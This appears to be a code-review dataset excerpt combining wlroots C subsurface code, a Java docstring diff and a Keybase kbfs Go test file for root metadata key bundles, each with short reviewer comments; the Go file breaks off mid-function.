static void subsurface_handle_set_sync(struct wl_client *client,
struct wl_resource *resource) {
struct wlr_subsurface *subsurface = subsurface_from_resource(resource);
if (subsurface == NULL) {
return;
}
subsurface->synchronized = true;
}
static void subsurface_handle_set_desync(struct wl_client *client,
struct wl_resource *resource) {
struct wlr_subsurface *subsurface = subsurface_from_resource(resource);
if (subsurface == NULL) {
return;
}
if (subsurface->synchronized) {
subsurface->synchronized = false;
if (!subsurface_is_synchronized(subsurface)) {
// TODO: do a synchronized commit to flush the cache
subsurface_parent_commit(subsurface, true);
}
}
}
static const struct wl_subsurface_interface subsurface_implementation = {
.destroy = subsurface_handle_destroy,
.set_position = subsurface_handle_set_position,
.place_above = subsurface_handle_place_above,
.place_below = subsurface_handle_place_below,
.set_sync = subsurface_handle_set_sync,
.set_desync = subsurface_handle_set_desync,
};
static void subsurface_handle_parent_destroy(struct wl_listener *listener,
void *data) {
struct wlr_subsurface *subsurface =
wl_container_of(listener, subsurface, parent_destroy);
wl_list_remove(&subsurface->parent_link);
wl_list_remove(&subsurface->parent_pending_link);
wl_list_remove(&subsurface->parent_destroy.link);
subsurface->parent = NULL;
}
static void subsurface_handle_surface_destroy(struct wl_listener *listener,
void *data) {
struct wlr_subsurface *subsurface =
wl_container_of(listener, subsurface, surface_destroy);
subsurface_destroy(subsurface);
}
struct wlr_subsurface *wlr_subsurface_create(struct wlr_surface *surface,
struct wlr_surface *parent, uint32_t version, uint32_t id,
struct wl_list *resource_list) {
assert(version <= SUBSURFACE_VERSION);
struct wl_client *client = wl_resource_get_client(surface->resource);
struct wlr_subsurface *subsurface =
calloc(1, sizeof(struct wlr_subsurface));
if (!subsurface) {
wl_client_post_no_memory(client);
return NULL;
}
subsurface->cached = surface_state_create();
if (subsurface->cached == NULL) {
free(subsurface);
wl_client_post_no_memory(client);
return NULL;
}
subsurface->synchronized = true;
subsurface->surface = surface;
subsurface->resource =
wl_resource_create(client, &wl_subsurface_interface, version, id);
if (subsurface->resource == NULL) {
surface_state_destroy(subsurface->cached);
free(subsurface);
wl_client_post_no_memory(client);
return NULL;
}
wl_resource_set_implementation(subsurface->resource,
&subsurface_implementation, subsurface,
subsurface_resource_destroy);
wl_signal_init(&subsurface->events.destroy);
wl_signal_add(&surface->events.destroy, &subsurface->surface_destroy);
subsurface->surface_destroy.notify = subsurface_handle_surface_destroy;
// link parent
subsurface->parent = parent;
wl_signal_add(&parent->events.destroy, &subsurface->parent_destroy);
subsurface->parent_destroy.notify = subsurface_handle_parent_destroy;
wl_list_insert(&parent->subsurfaces, &subsurface->parent_link);
wl_list_insert(&parent->subsurface_pending_list,
&subsurface->parent_pending_link);
surface->role_data = subsurface;
struct wl_list *resource_link = wl_resource_get_link(subsurface->resource);
if (resource_list != NULL) {
wl_list_insert(resource_list, resource_link);
} else {
wl_list_init(resource_link);
}
wlr_signal_emit_safe(&parent->events.new_subsurface, subsurface);
return subsurface;
}
struct wlr_surface *wlr_surface_get_root_surface(struct wlr_surface *surface) {
while (wlr_surface_is_subsurface(surface)) {
struct wlr_subsurface *subsurface =
wlr_subsurface_from_surface(surface);
surface = subsurface->parent;
}
return surface;
}
bool wlr_surface_point_accepts_input(struct wlr_surface *surface,
double sx, double sy) {
return sx >= 0 && sx <= surface->current->width &&
sy >= 0 && sy <= surface->current->height &&
pixman_region32_contains_point(&surface->current->input, sx, sy, NULL);
}
struct wlr_surface *wlr_surface_surface_at(struct wlr_surface *surface,
double sx, double sy, double *sub_x, double *sub_y) {
struct wlr_subsurface *subsurface;
wl_list_for_each(subsurface, &surface->subsurfaces, parent_link) {
double _sub_x = subsurface->surface->current->subsurface_position.x;
double _sub_y = subsurface->surface->current->subsurface_position.y;
struct wlr_surface *sub = wlr_surface_surface_at(subsurface->surface,
sx - _sub_x, sy - _sub_y, sub_x, sub_y);
if (sub != NULL) {
return sub;
}
}
if (wlr_surface_point_accepts_input(surface, sx, sy)) {
*sub_x = sx;
*sub_y = sy;
return surface;
}
return NULL;
}
void wlr_surface_send_enter(struct wlr_surface *surface,
struct wlr_output *output) {
struct wl_client *client = wl_resource_get_client(surface->resource);
struct wl_resource *resource;
wl_resource_for_each(resource, &output->wl_resources) {
if (client == wl_resource_get_client(resource)) {
wl_surface_send_enter(surface->resource, resource);
}
}
}
void wlr_surface_send_leave(struct wlr_surface *surface,
struct wlr_output *output) {
struct wl_client *client = wl_resource_get_client(surface->resource);
struct wl_resource *resource;
wl_resource_for_each(resource, &output->wl_resources) {
if (client == wl_resource_get_client(resource)) {
wl_surface_send_leave(surface->resource, resource);
}
}
}
static inline int64_t timespec_to_msec(const struct timespec *a) {
return (int64_t)a->tv_sec * 1000 + a->tv_nsec / 1000000;
}
void wlr_surface_send_frame_done(struct wlr_surface *surface,
const struct timespec *when) {
struct wlr_frame_callback *cb, *cnext;
wl_list_for_each_safe(cb, cnext, &surface->current->frame_callback_list,
link) {
wl_callback_send_done(cb->resource, timespec_to_msec(when));
wl_resource_destroy(cb->resource);
}
}
void wlr_surface_set_role_committed(struct wlr_surface *surface,
void (*role_committed)(struct wlr_surface *surface, void *role_data),
void *role_data) {
surface->role_committed = role_committed;
surface->role_data = role_data;
}
static void surface_for_each_surface(struct wlr_surface *surface, int x, int y,
wlr_surface_iterator_func_t iterator, void *user_data) {
iterator(surface, x, y, user_data);
struct wlr_subsurface *subsurface;
wl_list_for_each(subsurface, &surface->subsurfaces, parent_link) {
struct wlr_surface_state *state = subsurface->surface->current;
int sx = state->subsurface_position.x;
int sy = state->subsurface_position.y;
surface_for_each_surface(subsurface->surface, x + sx, y + sy,
iterator, user_data);
}
}
void wlr_surface_for_each_surface(struct wlr_surface *surface,
wlr_surface_iterator_func_t iterator, void *user_data) {
surface_for_each_surface(surface, 0, 0, iterator, user_data);
}
struct bound_acc {
int32_t min_x, min_y;
int32_t max_x, max_y;
};
static void handle_bounding_box_surface(struct wlr_surface *surface,
int x, int y, void *data) {
struct bound_acc *acc = data;
acc->min_x = min(x, acc->min_x);
acc->min_y = min(y, acc->min_y);
acc->max_x = max(x + surface->current->width, acc->max_x);
acc->max_y = max(y + surface->current->height, acc->max_y);
}
void wlr_surface_get_extends(struct wlr_surface *surface, struct wlr_box *box) {
struct bound_acc acc = {
.min_x = 0,
.min_y = 0,
.max_x = surface->current->width,
.max_y = surface->current->height,
};
wlr_surface_for_each_surface(surface, handle_bounding_box_surface, &acc);
box->x = acc.min_x;
box->y = acc.min_y;
box->width = acc.max_x - acc.min_x;
box->height = acc.max_y - acc.min_y;
}
| 1 | 11,733 | Wait, I think the `subsurface_handle_place_above` code was correct before. `place_above` means "place it above in rendering order" right? | swaywm-wlroots | c |
@@ -4,9 +4,10 @@ public class Test {
/**
* Docstring that looks like a list:
*
- * <p>1. hey 2. there
+ * 1. hey
+ * 2. there
*
- * <p>with blank line.
+ * with blank line.
*/
Void test() {
/* | 1 | package test;
public class Test {
/**
* Docstring that looks like a list:
*
* <p>1. hey 2. there
*
* <p>with blank line.
*/
Void test() {
/*
Normal comment
with blank line.
*/
}
}
| 1 | 8,796 | why did this change? | palantir-gradle-baseline | java |
@@ -15,12 +15,13 @@ import (
)
func TestBareRootMetadataVersionV3(t *testing.T) {
- tlfID := tlf.FakeID(1, false)
+ tlfID := tlf.FakeID(1, tlf.Private)
// All V3 objects should have SegregatedKeyBundlesVer.
uid := keybase1.MakeTestUID(1)
- bh, err := tlf.MakeHandle([]keybase1.UID{uid}, nil, nil, nil, nil)
+ bh, err := tlf.MakeHandle(
+ []keybase1.UserOrTeamID{uid.AsUserOrTeam()}, nil, nil, nil, nil)
require.NoError(t, err)
rmd, err := MakeInitialBareRootMetadataV3(tlfID, bh) | 1 | // Copyright 2016 Keybase Inc. All rights reserved.
// Use of this source code is governed by a BSD
// license that can be found in the LICENSE file.
package libkbfs
import (
"testing"
"github.com/keybase/client/go/protocol/keybase1"
"github.com/keybase/kbfs/kbfscodec"
"github.com/keybase/kbfs/kbfscrypto"
"github.com/keybase/kbfs/tlf"
"github.com/stretchr/testify/require"
)
func TestBareRootMetadataVersionV3(t *testing.T) {
tlfID := tlf.FakeID(1, false)
// All V3 objects should have SegregatedKeyBundlesVer.
uid := keybase1.MakeTestUID(1)
bh, err := tlf.MakeHandle([]keybase1.UID{uid}, nil, nil, nil, nil)
require.NoError(t, err)
rmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
require.Equal(t, SegregatedKeyBundlesVer, rmd.Version())
}
func TestRootMetadataV3ExtraNew(t *testing.T) {
tlfID := tlf.FakeID(1, false)
uid := keybase1.MakeTestUID(1)
bh, err := tlf.MakeHandle([]keybase1.UID{uid}, nil, nil, nil, nil)
require.NoError(t, err)
rmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
codec := kbfscodec.NewMsgpack()
crypto := MakeCryptoCommon(codec)
extra := FakeInitialRekey(rmd, bh, kbfscrypto.TLFPublicKey{})
extraV3, ok := extra.(*ExtraMetadataV3)
require.True(t, ok)
require.True(t, extraV3.wkbNew)
require.True(t, extraV3.rkbNew)
err = rmd.FinalizeRekey(crypto, extra)
require.NoError(t, err)
require.True(t, extraV3.wkbNew)
require.True(t, extraV3.rkbNew)
_, extraCopy, err := rmd.MakeSuccessorCopy(
codec, nil, extra, -1, nil, true)
require.NoError(t, err)
extraV3Copy, ok := extraCopy.(*ExtraMetadataV3)
require.True(t, ok)
require.False(t, extraV3Copy.wkbNew)
require.False(t, extraV3Copy.rkbNew)
}
func TestIsValidRekeyRequestBasicV3(t *testing.T) {
tlfID := tlf.FakeID(1, false)
uid := keybase1.MakeTestUID(1)
bh, err := tlf.MakeHandle([]keybase1.UID{uid}, nil, nil, nil, nil)
require.NoError(t, err)
codec := kbfscodec.NewMsgpack()
brmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
extra := FakeInitialRekey(brmd, bh, kbfscrypto.TLFPublicKey{})
newBrmd, err := brmd.DeepCopy(codec)
require.NoError(t, err)
newExtra, err := extra.DeepCopy(codec)
require.NoError(t, err)
ok, err := newBrmd.IsValidRekeyRequest(
codec, brmd, newBrmd.LastModifyingWriter(), extra, newExtra)
require.NoError(t, err)
// Should fail because the copy bit is unset.
require.False(t, ok)
// Set the copy bit; note the writer metadata is the same.
newBrmd.SetWriterMetadataCopiedBit()
// There's no internal signature to compare, so this should
// then work.
ok, err = newBrmd.IsValidRekeyRequest(
codec, brmd, newBrmd.LastModifyingWriter(), extra, newExtra)
require.NoError(t, err)
require.True(t, ok)
}
func TestBareRootMetadataPublicVersionV3(t *testing.T) {
tlfID := tlf.FakeID(1, true)
uid := keybase1.MakeTestUID(1)
bh, err := tlf.MakeHandle([]keybase1.UID{uid}, []keybase1.UID{keybase1.PublicUID}, nil, nil, nil)
require.NoError(t, err)
rmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
require.Equal(t, SegregatedKeyBundlesVer, rmd.Version())
bh2, err := rmd.MakeBareTlfHandle(nil)
require.Equal(t, bh, bh2)
}
func TestRevokeRemovedDevicesV3(t *testing.T) {
uid1 := keybase1.MakeTestUID(0x1)
uid2 := keybase1.MakeTestUID(0x2)
uid3 := keybase1.MakeTestUID(0x3)
key1 := kbfscrypto.MakeFakeCryptPublicKeyOrBust("key1")
key2 := kbfscrypto.MakeFakeCryptPublicKeyOrBust("key2")
key3 := kbfscrypto.MakeFakeCryptPublicKeyOrBust("key3")
half1a := kbfscrypto.MakeTLFCryptKeyServerHalf([32]byte{0x1})
half2a := kbfscrypto.MakeTLFCryptKeyServerHalf([32]byte{0x3})
half3a := kbfscrypto.MakeTLFCryptKeyServerHalf([32]byte{0x5})
codec := kbfscodec.NewMsgpack()
crypto := MakeCryptoCommon(codec)
id1a, err := crypto.GetTLFCryptKeyServerHalfID(uid1, key1, half1a)
require.NoError(t, err)
id2a, err := crypto.GetTLFCryptKeyServerHalfID(uid2, key2, half2a)
require.NoError(t, err)
id3a, err := crypto.GetTLFCryptKeyServerHalfID(uid3, key3, half3a)
require.NoError(t, err)
tlfID := tlf.FakeID(1, false)
bh, err := tlf.MakeHandle(
[]keybase1.UID{uid1, uid2}, []keybase1.UID{uid3}, nil, nil, nil)
require.NoError(t, err)
brmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
extra := FakeInitialRekey(brmd, bh, kbfscrypto.TLFPublicKey{})
wkb, rkb, err := brmd.getTLFKeyBundles(extra)
require.NoError(t, err)
*wkb = TLFWriterKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid1: DeviceKeyInfoMapV3{
key1: TLFCryptKeyInfo{
ServerHalfID: id1a,
EPubKeyIndex: 0,
},
},
uid2: DeviceKeyInfoMapV3{
key2: TLFCryptKeyInfo{
ServerHalfID: id2a,
EPubKeyIndex: 0,
},
},
},
}
*rkb = TLFReaderKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid3: DeviceKeyInfoMapV3{
key3: TLFCryptKeyInfo{
ServerHalfID: id3a,
EPubKeyIndex: 0,
},
},
},
}
updatedWriterKeys := UserDevicePublicKeys{
uid1: {key1: true},
}
updatedReaderKeys := UserDevicePublicKeys{
uid3: {key3: true},
}
removalInfo, err := brmd.RevokeRemovedDevices(
updatedWriterKeys, updatedReaderKeys, extra)
require.NoError(t, err)
require.Equal(t, ServerHalfRemovalInfo{
uid2: userServerHalfRemovalInfo{
userRemoved: true,
deviceServerHalfIDs: deviceServerHalfRemovalInfo{
key2: []TLFCryptKeyServerHalfID{id2a},
},
},
}, removalInfo)
expectedWKB := TLFWriterKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid1: DeviceKeyInfoMapV3{
key1: TLFCryptKeyInfo{
ServerHalfID: id1a,
EPubKeyIndex: 0,
},
},
},
}
require.Equal(t, expectedWKB, *wkb)
expectedRKB := TLFReaderKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid3: DeviceKeyInfoMapV3{
key3: TLFCryptKeyInfo{
ServerHalfID: id3a,
EPubKeyIndex: 0,
},
},
},
}
require.Equal(t, expectedRKB, *rkb)
}
// TestRevokeLastDeviceV3 checks behavior of RevokeRemovedDevices with
// respect to removing the last device of a user vs. removing the user
// completely.
func TestRevokeLastDeviceV3(t *testing.T) {
uid1 := keybase1.MakeTestUID(0x1)
uid2 := keybase1.MakeTestUID(0x2)
uid3 := keybase1.MakeTestUID(0x3)
uid4 := keybase1.MakeTestUID(0x4)
key1 := kbfscrypto.MakeFakeCryptPublicKeyOrBust("key1")
key2 := kbfscrypto.MakeFakeCryptPublicKeyOrBust("key2")
half1 := kbfscrypto.MakeTLFCryptKeyServerHalf([32]byte{0x1})
half2 := kbfscrypto.MakeTLFCryptKeyServerHalf([32]byte{0x2})
codec := kbfscodec.NewMsgpack()
crypto := MakeCryptoCommon(codec)
id1, err := crypto.GetTLFCryptKeyServerHalfID(uid1, key1, half1)
require.NoError(t, err)
id2, err := crypto.GetTLFCryptKeyServerHalfID(uid2, key2, half2)
require.NoError(t, err)
tlfID := tlf.FakeID(1, false)
bh, err := tlf.MakeHandle(
[]keybase1.UID{uid1, uid2}, []keybase1.UID{uid3, uid4}, nil, nil, nil)
require.NoError(t, err)
brmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
extra := FakeInitialRekey(brmd, bh, kbfscrypto.TLFPublicKey{})
wkb, rkb, err := brmd.getTLFKeyBundles(extra)
require.NoError(t, err)
*wkb = TLFWriterKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid1: DeviceKeyInfoMapV3{
key1: TLFCryptKeyInfo{
ServerHalfID: id1,
EPubKeyIndex: 0,
},
},
uid2: DeviceKeyInfoMapV3{
key2: TLFCryptKeyInfo{
ServerHalfID: id2,
EPubKeyIndex: 1,
},
},
},
}
*rkb = TLFReaderKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid3: DeviceKeyInfoMapV3{},
uid4: DeviceKeyInfoMapV3{},
},
}
updatedWriterKeys := UserDevicePublicKeys{
uid1: {},
}
updatedReaderKeys := UserDevicePublicKeys{
uid3: {},
}
removalInfo, err := brmd.RevokeRemovedDevices(
updatedWriterKeys, updatedReaderKeys, extra)
require.NoError(t, err)
require.Equal(t, ServerHalfRemovalInfo{
uid1: userServerHalfRemovalInfo{
deviceServerHalfIDs: deviceServerHalfRemovalInfo{
key1: []TLFCryptKeyServerHalfID{id1},
},
},
uid2: userServerHalfRemovalInfo{
userRemoved: true,
deviceServerHalfIDs: deviceServerHalfRemovalInfo{
key2: []TLFCryptKeyServerHalfID{id2},
},
},
uid4: userServerHalfRemovalInfo{
userRemoved: true,
deviceServerHalfIDs: deviceServerHalfRemovalInfo{},
},
}, removalInfo)
expectedWKB := TLFWriterKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid1: DeviceKeyInfoMapV3{},
},
}
require.Equal(t, expectedWKB, *wkb)
expectedRKB := TLFReaderKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid3: DeviceKeyInfoMapV3{},
},
}
require.Equal(t, expectedRKB, *rkb)
}
// expectedRekeyInfoV3 contains all the information needed to check a
// rekey run (that doesn't add a generation).
//
// If writerPrivKeys is empty, then writerEPubKeyIndex is ignored, and
// similarly for readerPrivKeys. If both are empty, then ePubKey is
// also ignored.
type expectedRekeyInfoV3 struct {
writerPrivKeys, readerPrivKeys userDevicePrivateKeys
serverHalves UserDeviceKeyServerHalves
writerEPubKeyIndex, readerEPubKeyIndex int
ePubKey kbfscrypto.TLFEphemeralPublicKey
}
// checkGetTLFCryptKeyV3 checks that wkb and rkb contain the info
// necessary to get the TLF crypt key for each user in expected, which
// must all match expectedTLFCryptKey.
func checkGetTLFCryptKeyV3(t *testing.T, expected expectedRekeyInfoV3,
expectedTLFCryptKey kbfscrypto.TLFCryptKey,
wkb *TLFWriterKeyBundleV3, rkb *TLFReaderKeyBundleV3) {
for uid, privKeys := range expected.writerPrivKeys {
for privKey := range privKeys {
pubKey := privKey.GetPublicKey()
serverHalf, ok := expected.serverHalves[uid][pubKey]
require.True(t, ok, "writer uid=%s, key=%s",
uid, pubKey)
info, ok := wkb.Keys[uid][pubKey]
require.True(t, ok)
ePubKey := wkb.TLFEphemeralPublicKeys[info.EPubKeyIndex]
checkCryptKeyInfo(t, privKey, serverHalf,
expected.writerEPubKeyIndex, expected.ePubKey,
expectedTLFCryptKey, info, ePubKey)
}
}
for uid, privKeys := range expected.readerPrivKeys {
for privKey := range privKeys {
pubKey := privKey.GetPublicKey()
serverHalf, ok := expected.serverHalves[uid][pubKey]
require.True(t, ok, "reader uid=%s, key=%s",
uid, pubKey)
info, ok := rkb.Keys[uid][pubKey]
require.True(t, ok)
ePubKey := rkb.TLFEphemeralPublicKeys[info.EPubKeyIndex]
checkCryptKeyInfo(t, privKey, serverHalf,
expected.readerEPubKeyIndex, expected.ePubKey,
expectedTLFCryptKey, info, ePubKey)
}
}
}
func userDeviceKeyInfoMapV3ToPublicKeys(udkimV3 UserDeviceKeyInfoMapV3) UserDevicePublicKeys {
pubKeys := make(UserDevicePublicKeys)
for uid, dkimV3 := range udkimV3 {
pubKeys[uid] = make(DevicePublicKeys)
for key := range dkimV3 {
pubKeys[uid][key] = true
}
}
return pubKeys
}
// checkKeyBundlesV3 checks that wkb and rkb contain exactly the info
// expected from expectedRekeyInfos and expectedPubKey.
func checkKeyBundlesV3(t *testing.T, expectedRekeyInfos []expectedRekeyInfoV3,
expectedTLFCryptKey kbfscrypto.TLFCryptKey,
expectedPubKey kbfscrypto.TLFPublicKey,
wkb *TLFWriterKeyBundleV3, rkb *TLFReaderKeyBundleV3) {
expectedWriterPubKeys := make(UserDevicePublicKeys)
expectedReaderPubKeys := make(UserDevicePublicKeys)
var expectedWriterEPublicKeys,
expectedReaderEPublicKeys kbfscrypto.TLFEphemeralPublicKeys
for _, expected := range expectedRekeyInfos {
expectedWriterPubKeys = accumulatePublicKeys(
expectedWriterPubKeys,
expected.writerPrivKeys.toPublicKeys())
expectedReaderPubKeys = accumulatePublicKeys(
expectedReaderPubKeys,
expected.readerPrivKeys.toPublicKeys())
if expected.writerPrivKeys.hasKeys() {
require.Equal(t, expected.writerEPubKeyIndex,
len(expectedWriterEPublicKeys))
expectedWriterEPublicKeys = append(
expectedWriterEPublicKeys,
expected.ePubKey)
}
if expected.readerPrivKeys.hasKeys() {
require.Equal(t, expected.readerEPubKeyIndex,
len(expectedReaderEPublicKeys))
expectedReaderEPublicKeys = append(
expectedReaderEPublicKeys,
expected.ePubKey)
}
}
writerPubKeys := userDeviceKeyInfoMapV3ToPublicKeys(wkb.Keys)
readerPubKeys := userDeviceKeyInfoMapV3ToPublicKeys(rkb.Keys)
require.Equal(t, expectedWriterPubKeys, writerPubKeys)
require.Equal(t, expectedReaderPubKeys, readerPubKeys)
require.Equal(t, expectedWriterEPublicKeys, wkb.TLFEphemeralPublicKeys)
require.Equal(t, expectedReaderEPublicKeys, rkb.TLFEphemeralPublicKeys)
require.Equal(t, expectedPubKey, wkb.TLFPublicKey)
for _, expected := range expectedRekeyInfos {
expectedUserPubKeys := unionPublicKeyUsers(
expected.writerPrivKeys.toPublicKeys(),
expected.readerPrivKeys.toPublicKeys())
userPubKeys := userDeviceServerHalvesToPublicKeys(
expected.serverHalves)
require.Equal(t, expectedUserPubKeys.removeKeylessUsersForTest(), userPubKeys)
checkGetTLFCryptKeyV3(t,
expected, expectedTLFCryptKey, wkb, rkb)
}
}
func TestBareRootMetadataV3UpdateKeyBundles(t *testing.T) {
uid1 := keybase1.MakeTestUID(1)
uid2 := keybase1.MakeTestUID(2)
uid3 := keybase1.MakeTestUID(3)
privKey1 := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key1")
privKey2 := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key2")
privKey3 := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key3")
updatedWriterKeys := UserDevicePublicKeys{
uid1: {privKey1.GetPublicKey(): true},
uid2: {privKey2.GetPublicKey(): true},
}
updatedReaderKeys := UserDevicePublicKeys{
uid3: {privKey3.GetPublicKey(): true},
}
tlfID := tlf.FakeID(1, false)
bh, err := tlf.MakeHandle(
[]keybase1.UID{uid1, uid2}, []keybase1.UID{uid3},
[]keybase1.SocialAssertion{{}},
nil, nil)
require.NoError(t, err)
rmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
codec := kbfscodec.NewMsgpack()
crypto := MakeCryptoCommon(codec)
ePubKey1, ePrivKey1, err := crypto.MakeRandomTLFEphemeralKeys()
require.NoError(t, err)
// Add first key generations, although only the last one
// matters.
latestKeyGen := FirstValidKeyGen + 5
var pubKey kbfscrypto.TLFPublicKey
var tlfCryptKey kbfscrypto.TLFCryptKey
var extra ExtraMetadata
var serverHalves1 UserDeviceKeyServerHalves
for keyGen := FirstValidKeyGen; keyGen <= latestKeyGen; keyGen++ {
fakeKeyData := [32]byte{byte(keyGen)}
pubKey = kbfscrypto.MakeTLFPublicKey(fakeKeyData)
nextTLFCryptKey := kbfscrypto.MakeTLFCryptKey(fakeKeyData)
// Use the same ephemeral keys for initial key
// generations, even though that can't happen in
// practice.
var err error
extra, serverHalves1, err = rmd.AddKeyGeneration(codec,
crypto, extra, updatedWriterKeys, updatedReaderKeys,
ePubKey1, ePrivKey1,
pubKey, tlfCryptKey, nextTLFCryptKey)
require.NoError(t, err)
tlfCryptKey = nextTLFCryptKey
}
wkb, rkb, err := rmd.getTLFKeyBundles(extra)
require.NoError(t, err)
expectedRekeyInfo1 := expectedRekeyInfoV3{
writerPrivKeys: userDevicePrivateKeys{
uid1: {privKey1: true},
uid2: {privKey2: true},
},
readerPrivKeys: userDevicePrivateKeys{
uid3: {privKey3: true},
},
serverHalves: serverHalves1,
writerEPubKeyIndex: 0,
readerEPubKeyIndex: 0,
ePubKey: ePubKey1,
}
expectedRekeyInfos := []expectedRekeyInfoV3{expectedRekeyInfo1}
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
// Do update to check idempotency.
tlfCryptKeys := []kbfscrypto.TLFCryptKey{tlfCryptKey}
serverHalves1b, err := rmd.UpdateKeyBundles(crypto,
extra, updatedWriterKeys, updatedReaderKeys,
ePubKey1, ePrivKey1, tlfCryptKeys)
require.NoError(t, err)
require.Equal(t, 1, len(serverHalves1b))
expectedRekeyInfo1b := expectedRekeyInfoV3{
serverHalves: serverHalves1b[0],
}
expectedRekeyInfos = append(expectedRekeyInfos, expectedRekeyInfo1b)
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
// Rekey.
privKey1b := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key1b")
updatedWriterKeys[uid1][privKey1b.GetPublicKey()] = true
privKey3b := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key3b")
updatedReaderKeys[uid3][privKey3b.GetPublicKey()] = true
ePubKey2, ePrivKey2, err := crypto.MakeRandomTLFEphemeralKeys()
require.NoError(t, err)
serverHalves2, err := rmd.UpdateKeyBundles(crypto,
extra, updatedWriterKeys, updatedReaderKeys,
ePubKey2, ePrivKey2, tlfCryptKeys)
require.NoError(t, err)
require.Equal(t, 1, len(serverHalves2))
expectedRekeyInfo2 := expectedRekeyInfoV3{
writerPrivKeys: userDevicePrivateKeys{
uid1: {privKey1b: true},
},
readerPrivKeys: userDevicePrivateKeys{
uid3: {privKey3b: true},
},
serverHalves: serverHalves2[0],
writerEPubKeyIndex: 1,
readerEPubKeyIndex: 1,
ePubKey: ePubKey2,
}
expectedRekeyInfos = append(expectedRekeyInfos, expectedRekeyInfo2)
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
// Do again to check idempotency.
serverHalves2b, err := rmd.UpdateKeyBundles(crypto,
extra, updatedWriterKeys, updatedReaderKeys,
ePubKey2, ePrivKey2, tlfCryptKeys)
require.NoError(t, err)
require.Equal(t, 1, len(serverHalves2b))
expectedRekeyInfo2b := expectedRekeyInfoV3{
serverHalves: serverHalves2b[0],
}
expectedRekeyInfos = append(expectedRekeyInfos, expectedRekeyInfo2b)
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
// Rekey writers only.
privKey1c := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key1c")
updatedWriterKeys[uid1][privKey1c.GetPublicKey()] = true
ePubKey3, ePrivKey3, err := crypto.MakeRandomTLFEphemeralKeys()
require.NoError(t, err)
serverHalves3, err := rmd.UpdateKeyBundles(crypto,
extra, updatedWriterKeys, updatedReaderKeys,
ePubKey3, ePrivKey3, tlfCryptKeys)
require.NoError(t, err)
require.Equal(t, 1, len(serverHalves3))
expectedRekeyInfo3 := expectedRekeyInfoV3{
writerPrivKeys: userDevicePrivateKeys{
uid1: {privKey1c: true},
},
readerPrivKeys: nil,
serverHalves: serverHalves3[0],
writerEPubKeyIndex: 2,
readerEPubKeyIndex: -1,
ePubKey: ePubKey3,
}
expectedRekeyInfos = append(expectedRekeyInfos, expectedRekeyInfo3)
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
// Do again to check idempotency.
serverHalves3b, err := rmd.UpdateKeyBundles(crypto,
extra, updatedWriterKeys, updatedReaderKeys,
ePubKey3, ePrivKey3, tlfCryptKeys)
require.NoError(t, err)
require.Equal(t, 1, len(serverHalves3b))
expectedRekeyInfo3b := expectedRekeyInfoV3{
serverHalves: serverHalves3b[0],
}
expectedRekeyInfos = append(expectedRekeyInfos, expectedRekeyInfo3b)
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
// Reader rekey.
privKey3c := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key3c")
privKey3d := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key3d")
updatedReaderKeys[uid3][privKey3c.GetPublicKey()] = true
updatedReaderKeys[uid3][privKey3d.GetPublicKey()] = true
ePubKey4, ePrivKey4, err := crypto.MakeRandomTLFEphemeralKeys()
require.NoError(t, err)
filteredReaderKeys := UserDevicePublicKeys{
uid3: updatedReaderKeys[uid3],
}
serverHalves4, err := rmd.UpdateKeyBundles(crypto,
extra, nil, filteredReaderKeys,
ePubKey4, ePrivKey4, tlfCryptKeys)
require.NoError(t, err)
require.Equal(t, 1, len(serverHalves4))
expectedRekeyInfo4 := expectedRekeyInfoV3{
writerPrivKeys: nil,
readerPrivKeys: userDevicePrivateKeys{
uid3: {privKey3c: true, privKey3d: true},
},
serverHalves: serverHalves4[0],
writerEPubKeyIndex: -1,
readerEPubKeyIndex: 2,
ePubKey: ePubKey4,
}
expectedRekeyInfos = append(expectedRekeyInfos, expectedRekeyInfo4)
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
// Do again to check idempotency.
serverHalves4b, err := rmd.UpdateKeyBundles(crypto,
extra, nil, filteredReaderKeys,
ePubKey4, ePrivKey4, tlfCryptKeys)
require.NoError(t, err)
require.Equal(t, 1, len(serverHalves4b))
expectedRekeyInfo4b := expectedRekeyInfoV3{
serverHalves: serverHalves4b[0],
}
expectedRekeyInfos = append(expectedRekeyInfos, expectedRekeyInfo4b)
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
}
// TestBareRootMetadataV3AddKeyGenerationKeylessUsers checks that
// keyless users are handled properly by AddKeyGeneration.
func TestBareRootMetadataV3AddKeyGenerationKeylessUsers(t *testing.T) {
uid1 := keybase1.MakeTestUID(1)
uid2 := keybase1.MakeTestUID(2)
uid3 := keybase1.MakeTestUID(3)
